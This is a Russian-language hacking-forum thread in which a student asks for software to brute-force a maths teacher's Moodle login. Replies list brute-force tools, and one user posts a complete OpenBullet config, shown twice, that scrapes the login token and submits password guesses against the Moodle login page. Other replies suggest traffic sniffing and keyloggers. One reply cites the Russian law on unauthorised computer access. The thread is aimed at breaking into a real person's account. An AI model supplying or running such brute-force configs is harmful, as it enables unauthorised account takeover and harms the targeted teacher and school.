Артемий Закамянелый
Newbie
- 10.02.2020
- 2
- 0
Достала эта математичка, хз откуда берет свои тесты. А на этом *сайте* никакой капчи нифига, хоть целое столетие пробуй заходить с одним логином.
Подскажите софтину для брута учетки на сайте на Moodle.
- Автор темы Артемий Закамянелый
- Дата начала
-
- Теги
- brute force moodle
but43r
Green Team
- 23.12.2019
- 19
- 2
1. BurpSuite (Intruder)
2. Patator (модуль - http_fuzz)
3. Wfuzz
4. Ffuf
Последнее редактирование:
yky
Green Team
- 31.12.2019
- 100
- 41
Скачиваешь OpenBullet вставляешь конфиг:
Прокси по желанию можно взять тут или тут
P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
REQUEST GET "https*://moodle.org/*login/index.php"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"
REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"
REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"
Прокси по желанию можно взять тут или тут
P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
Последнее редактирование:
Кудрявый
Green Team
- 06.03.2017
- 14
- 19
Проще снифать трафик или кейлогеры делать.
Хотя по опыту скажу, что хорошие пороли только админ и сетевик ставили, все остальные значимые пароли. Фамилии, дата, девичия фамилия и etc.
Брут можно хоть на javascripte написать в violantmonkey. Там один запрос и прокси.
Хотя по опыту скажу, что хорошие пороли только админ и сетевик ставили, все остальные значимые пароли. Фамилии, дата, девичия фамилия и etc.
Брут можно хоть на javascripte написать в violantmonkey. Там один запрос и прокси.
z3r0c10wn
Grey Team
- 04.09.2017
- 246
- 295
УК РФ Статья 272. Неправомерный доступ к компьютерной информации \ КонсультантПлюс
УК РФ Статья 272. Неправомерный доступ к компьютерной информации (в ред. Федерального закона от 07.12.2011 N 420-ФЗ) (см. текст в предыдущей редакции) 1. Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло...
www.consultant.ru
Щербак Щербак
Newbie
- 27.06.2022
- 1
- 0
Так , а для тупых можно такойже но с уже извесным логином и просто подбор паролей?
Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab
Похожие темы
- Статья
- Статья
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
Популярный контент
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →